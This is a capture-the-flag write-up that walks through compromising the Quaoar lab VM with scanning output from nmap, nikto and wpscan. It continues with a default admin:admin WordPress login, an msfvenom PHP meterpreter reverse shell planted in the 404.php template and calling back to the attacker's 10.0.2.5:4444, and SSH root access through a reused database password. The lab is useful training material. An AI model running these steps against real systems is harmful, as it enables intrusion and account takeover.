Quaoar CTF

Started with discovery of the IP address of the VM.

root@kali:~# netdiscover -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:5e:b4:5a 1 60 Cadmus Computer Systems
10.0.2.43 08:00:27:38:0c:1b 1 60 Cadmus Computer Systems

IP of the VM is 10.0.2.43. Then made a port scan with nmap.

root@kali:~# nmap -p- — script=banner 10.0.2.43
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.43
Host is up (0.00018s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1
53/tcp open domain
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s

MAC Address: 08:00:27:38:0C:1B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

Port 80/tcp is open. Firstly made a request on browser to port 80/tcp.

There were only images and nothing in source code of the page. Started to scan with nikto.

root@kali:~# nikto -h http://10.0.2.43
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 10.0.2.43
+ Target Hostname: 10.0.2.43
+ Target Port: 80
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10–1ubuntu3
+ Entry ‘/wordpress/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 2 entries which should be manually viewed.

+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested

Wordpress installation is found. I was planning to brute force directories with dirb but wp-scan was seems like a better option.

root@kali:~# wpscan -u http://10.0.2.43/wordpress — enumerate u WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri — https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]
[+] URL: http://10.0.2.43/wordpress/
[!] The WordPress ‘http://10.0.2.43/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10–1ubuntu3
[+] XML-RPC Interface available under: http://10.0.2.43/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.2.43/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.2.43/wordpress/wp-includes/
[+] WordPress version 3.9.14 identified from meta generator (Released on 2016–09–07)
[+] WordPress theme in use: twentyfourteen — v1.1
[+] Name: twentyfourteen — v1.1
| Location: http://10.0.2.43/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.9
| Style URL: http://10.0.2.43/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des…
| Author: the WordPress team
| Author URI: http://wordpress.org/
[+] Enumerating plugins from passive detection …
[+] No plugins found
[+] Enumerating usernames …
[+] Identified the following 2 user/s:
+ — — + — — — — + — — — — +
| Id | Login | Name |
+ — — + — — — — + — — — — +
| 1 | admin | admin |
| 2 | wpuser | wpuser |
+ — — + — — — — + — — — — +

[!] Default first WordPress username ‘admin’ is still used
[+] Requests Done: 55
[+] Memory used: 15.738 MB
[+] Elapsed time: 00:00:05

2 users were found. While I was rescanning wordpress for brute force to admin user, I manually tried username: admin & pass:admin and I was in.

Next step was to gain a shell. I know that some php files can be edited in Editor under Appearance menu.

404.php was the first file on the templates list and I decided to edit it. Generated php reverse shell with msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 -f raw > Desktop/shell.php 

From permalink field in posts menu found that possible page location was /wordpress/?p=404.php. Tried if it was working with netcat and I could get a reverse shell.

Then I decided to go on with meterpreter. Closed netcat and opened a new listener on metasploit.

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.5
lhost => 10.0.2.5
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST 10.0.2.5 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— — —
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] Starting the payload handler…

After reload the 404.php I gained reverse shell once again.

[*] Sending stage (33068 bytes) to 10.0.2.43
[*] Meterpreter session 1 opened (10.0.2.5:4444 -> 10.0.2.43:41189)

I got the sysinfo.

meterpreter > sysinfo
Computer : Quaoar
OS : Linux Quaoar 3.2.0–23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/php

Tried to run a few exploits based on the kernel version but gcc was not installed on the VM. So I started to explore the files. I was in /var/www/wordpress directory.

meterpreter > ls
Listing: /var/www/wordpress
===========================
Mode Size Type Last modified Name
— — — — — — — — — — — — — — —
100644/rw-r — r — 418 fil 2016–10–26 20:45:26 -0400 index.php
100644/rw-r — r — 19930 fil 2016–10–26 20:45:26 -0400 license.txt
100644/rw-r — r — 7195 fil 2016–10–26 20:45:26 -0400 readme.html
100644/rw-r — r — 4896 fil 2016–10–26 20:45:26 -0400 wp-activate.php
40755/rwxr-xr-x 4096 dir 2016–10–26 20:45:26 -0400 wp-admin
100644/rw-r — r — 271 fil 2016–10–26 20:45:26 -0400 wp-blog-header.php
100644/rw-r — r — 4818 fil 2016–10–26 20:45:26 -0400 wp-comments-post.php
100644/rw-r — r — 3087 fil 2016–10–26 20:45:26 -0400 wp-config-sample.php
100666/rw-rw-rw- 3441 fil 2016–11–30 00:02:01 -0500 wp-config.php
40755/rwxr-xr-x 4096 dir 2016–10–26 20:45:26 -0400 wp-content
100644/rw-r — r — 2932 fil 2016–10–26 20:45:26 -0400 wp-cron.php
40755/rwxr-xr-x 4096 dir 2016–10–26 20:45:26 -0400 wp-includes
100644/rw-r — r — 2380 fil 2016–10–26 20:45:26 -0400 wp-links-opml.php
100644/rw-r — r — 2359 fil 2016–10–26 20:45:26 -0400 wp-load.php
100644/rw-r — r — 33609 fil 2016–10–26 20:45:26 -0400 wp-login.php
100644/rw-r — r — 8235 fil 2016–10–26 20:45:26 -0400 wp-mail.php
100644/rw-r — r — 11070 fil 2016–10–26 20:45:26 -0400 wp-settings.php
100644/rw-r — r — 25665 fil 2016–10–26 20:45:26 -0400 wp-signup.php
100644/rw-r — r — 4026 fil 2016–10–26 20:45:26 -0400 wp-trackback.php
100644/rw-r — r — 3032 fil 2016–10–26 20:45:26 -0400 xmlrpc.php

In wp-config.php file I found username and password for mysql account.

/ ** MySQL settings — You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);
/** MySQL database username */
define(‘DB_USER’, ‘root’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘rootpassword!’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);

But mysql was not running as root.

meterpreter > ps
Process List
============
PID Name Arch User Path
1136 /usr/sbin/mysqld mysql /usr/sbin/mysqld

At first I looked a few more directories to find something else and spent a little time. Then I thought that Wordpress Admin credentials were admin:admin. Then why cannot be mysql credentials same with root credentials. Tried to login from ssh with the credentials in config file.

root@kali:~# ssh root@10.0.2.43
The authenticity of host ‘10.0.2.43 (10.0.2.43)’ can’t be established.
ECDSA key fingerprint is SHA256:+ODdJgfptUyyVzKI9wDm804SlXxzmb4/BiKsHCnHGeg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘10.0.2.43’ (ECDSA) to the list of known hosts.
root@10.0.2.43’s password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0–23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System load: 0.26 Processes: 105
Usage of /: 30.8% of 7.21GB Users logged in: 0
Memory usage: 30% IP address for eth0: 10.0.2.43
Swap usage: 0% IP address for virbr0: 192.168.122.1
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
New release ‘14.04.5 LTS’ available.
Run ‘do-release-upgrade’ to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

I was in as root. Next mission was to find the flags. flag.txt was the most possible name for flags.

root@Quaoar:~# updatedb
root@Quaoar:~# locate flag.txt
/home/wpadmin/flag.txt
/root/flag.txt

root@Quaoar:~# cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
root@Quaoar:~# cat /root/flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#